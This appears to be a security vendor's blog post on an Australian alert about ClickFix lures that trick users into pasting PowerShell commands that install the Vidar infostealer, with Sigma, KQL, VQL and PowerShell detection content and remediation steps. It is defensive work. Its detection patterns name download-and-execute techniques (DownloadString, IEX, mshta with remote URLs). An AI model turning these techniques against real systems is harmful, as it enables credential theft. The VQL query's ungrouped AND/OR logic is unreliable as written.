Back to Intelligence

ClickFix Attacks Delivering Vidar Infostealer: ACSC Detection & Defense Guide

SA
Security Arsenal Team
May 9, 2026
6 min read

The Australian Cyber Security Centre (ACSC) has issued a critical alert regarding an active campaign employing "ClickFix" techniques to deliver the Vidar information stealer. Unlike traditional phishing relying on malicious attachments, ClickFix bypasses many email gateway defenses by weaponizing the user's browser. Victims are lured—often via SEO poisoning—to fake websites displaying fraudulent error messages or CAPTCHAs. Under the guise of "verifying humanity" or fixing a browser issue, users are socially engineered into copying and executing arbitrary PowerShell commands. This results in the immediate download and execution of the Vidar infostealer. For defenders, this represents a significant gap in traditional perimeter controls, as the initial "payload" is a user-initiated, trusted shell command.

Technical Analysis

Threat Vector: Social Engineering / ClickFix (Browser-based Fake Technical Support).

Malware Payload: Vidar Infostealer. This modular malware targets sensitive data including browser cookies, history, saved passwords, cryptocurrency wallets, and 2FA credentials. It often serves as a loader for secondary payloads like ransomware (e.g., Stop/Djvu).

Attack Chain Breakdown:

  1. Initial Access: User navigates to a compromised or malicious website (often delivered via SEO poisoning).
  2. Social Engineering: A fake overlay (fake browser update, CAPTCHA, or error) instructs the user to open "Run" (WIN+R) or PowerShell.
  3. Execution: The user pastes a command provided by the site. This command is typically a PowerShell one-liner utilizing Invoke-Expression (IEX) or Invoke-WebRequest to fetch a second-stage script or binary.
  4. Persistence: Vidar often establishes persistence via scheduled tasks or registry run keys.
  5. Exfiltration: Stolen data is sent to the threat actor's C2 server via HTTP/HTTPS.

Exploitation Status: Confirmed Active Exploitation. The ACSC has identified this campaign targeting Australian organizations, though the nature of web-based delivery makes it a global threat.

Detection & Response

This threat relies on a behavioral anomaly: a user manually executing a complex shell command provided by a web browser. We detect this by looking for the unusual parent-child process relationships and the specific command-line syntax associated with ClickFix (PowerShell spawning MSHTA or making web requests).

YAML
---
title: Potential ClickFix Activity - Browser Spawning PowerShell
id: 8a1b2c3d-4e5f-6789-0abc-1d2e3f4a5b6c
status: experimental
description: Detects potential ClickFix social engineering where a browser process spawns PowerShell. This is highly suspicious as browsers do not typically launch shell environments.
references:
  - https://www.cyber.gov.au/acsc/view-all-content/alerts/clickfix
tags:
  - attack.initial_access
  - attack.t1566.002
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - '\chrome.exe'
      - '\msedge.exe'
      - '\firefox.exe'
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  condition: selection
falsepositives:
  - Legitimate administrative web tools launching local scripts (rare)
level: high
---
title: ClickFix Payload Delivery - PowerShell Spawning MSHTA with URL
id: 9b2c3d4e-5f6a-7890-1bcd-2e3f4a5b6c7d
status: experimental
description: Detects the classic ClickFix payload delivery where PowerShell launches mshta.exe with a remote URL argument, indicative of fetching a malicious HTML Application (HTA).
references:
  - https://attack.mitre.org/techniques/T1059/001
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
    Image|endswith: '\mshta.exe'
    CommandLine|contains: 'http'
  condition: selection
falsepositives:
  - Legacy internal enterprise applications launching help files
level: critical
---
title: Vidar Stealer Behavior - PowerShell DownloadString
id: 0c3d4e5f-6a7b-8901-2cde-3f4a5b6c7d8e
status: experimental
description: Detects PowerShell commands characteristic of ClickFix droppers, specifically combining 'DownloadString' with obfuscation techniques or direct execution.
references:
  - https://www.infosecurity-magazine.com/news/australian-cyber-security-centre/
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'DownloadString'
      - 'IEX '
      - 'Invoke-Expression'
  filter_legit_admin:
    CommandLine|contains:
      - 'System.Management.Automation'
  condition: selection and not filter_legit_admin
falsepositives:
  - Administrators running remote scripts manually
level: medium


**KQL (Microsoft Sentinel / Defender)**

Hunt for the specific process tree indicative of ClickFix attacks.

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix: Browser -> PowerShell -> MSHTA or Network Request
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ('chrome.exe', 'msedge.exe', 'firefox.exe')
| where FileName in~ ('powershell.exe', 'cmd.exe', 'mshta.exe')
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, FileName, ProcessCommandLine, FolderPath
| extend ClickFixIndicator = iff(
    FileName =~ 'powershell.exe' and (ProcessCommandLine contains 'DownloadString' or ProcessCommandLine contains 'IEX'), 'Suspicious PS Command',
    FileName =~ 'mshta.exe' and ProcessCommandLine contains 'http', 'Suspicious MSHTA Execution',
    'Suspicious Parent Process')
| where isnotempty(ClickFixIndicator)
| order by Timestamp desc


**Velociraptor VQL**

Hunt endpoint for process creation chains matching the ClickFix profile (Browser spawning PowerShell).

VQL — Velociraptor
-- Hunt for Browser Spawning PowerShell or CMD
SELECT Pid, Name, CommandLine, Exe, Username, CreateTime
FROM chain(
  parent=pslist(),
  child=pslist()
)
WHERE parent.Name =~ 'chrome.exe' 
   OR parent.Name =~ 'msedge.exe' 
   OR parent.Name =~ 'firefox.exe'
   AND child.Name =~ 'powershell.exe'
   OR child.Name =~ 'cmd.exe'


**Remediation Script (PowerShell)**

This script performs two actions: it verifies if PowerShell Script Block Logging is enabled (critical for detecting these attacks) and hunts the event logs for recent "ClickFix" patterns to identify compromised hosts.

PowerShell
# Ensure PowerShell Script Block Logging is enabled for detection
$registryPath = 'HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
$name = 'EnableScriptBlockLogging'
$value = 1

if (-not (Test-Path $registryPath)) {
    New-Item -Path $registryPath -Force | Out-Null
    Write-Host "[+] Created ScriptBlock Logging registry path."
} else {
    Write-Host "[*] ScriptBlock Logging registry path exists."
}

$currentValue = (Get-ItemProperty -Path $registryPath -Name $name -ErrorAction SilentlyContinue).$name
if ($currentValue -ne $value) {
    Set-ItemProperty -Path $registryPath -Name $name -Value $value -Type DWord
    Write-Host "[+] Enabled ScriptBlock Logging."
} else {
    Write-Host "[+] ScriptBlock Logging is already enabled."
}

# Hunt Security Event Log for ClickFix indicators (Event ID 4688)
Write-Host "[*] Hunting for ClickFix indicators in Security Log (Last 24h)..."
$events = Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688; StartTime=(Get-Date).AddHours(-24)} -ErrorAction SilentlyContinue

if ($events) {
    $clickFixHits = $events | Where-Object { 
        $_.Message -match 'ParentProcessName.*\(chrome|msedge|firefox)\.exe' -and 
        $_.Message -match 'NewProcessName.*\(powershell|cmd)\.exe'
    }
    
    if ($clickFixHits) {
        Write-Host "[!] ALERT: Potential ClickFix activity detected!" -ForegroundColor Red
        $clickFixHits | Format-List TimeCreated, Message
    } else {
        Write-Host "[+] No immediate ClickFix process chains found in last 24h."
    }
} else {
    Write-Host "[-] No 4688 events found (Audit Policy might be off or Sysmon not configured)."
}

Remediation

1. Immediate User Awareness: Issue a security advisory to all staff immediately. Warn them specifically against copying and pasting commands from browser error messages or "verification" pop-ups into PowerShell or the Run dialog. The browser will NEVER ask a user to execute a shell command to fix a display issue.

2. Enable Attack Surface Reduction (ASR) Rules:

  • Rule ID: "Block JavaScript or VBScript from launching downloaded executable content" (GUID: D3E037E1-3EB8-44C8-A917-57927947596D).
  • Rule ID: "Block Office applications from creating child processes" (GUID: 01443614-cd74-433a-b99e-2ecdc07bfc25) - (While this is primarily Office, it helps if the lure is a document).
  • Action: Configure these rules in "Audit" mode first to gauge noise, then move to "Block".

3. Harden PowerShell Execution Policy: While not a silver bullet, ensuring Restricted or RemoteSigned mode prevents ad-hoc script execution if the attacker attempts to save a .ps1 file. Ensure ScriptBlockLogging and ModuleLogging are enforced via Group Policy.

4. Web Filtering: Implement URL filtering blocks against categories known to host fraudulent tech support pages (e.g., "Phishing," "Newly Registered Domains") if feasible.

5. Incident Response: If the detection rules trigger, treat the host as compromised. Isolate the machine, capture a memory image, and scour for persistence mechanisms (Startup folders, Scheduled Tasks) used by Vidar. Revoke all credentials saved in browsers on the affected machine.

Related Resources

Security Arsenal Managed SOC Services AlertMonitor Platform Book a SOC Assessment soc-mdr Intel Hub

mdrthreat-huntingendpoint-detectionsecurity-monitoringvidarclickfixacscinfostealer

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action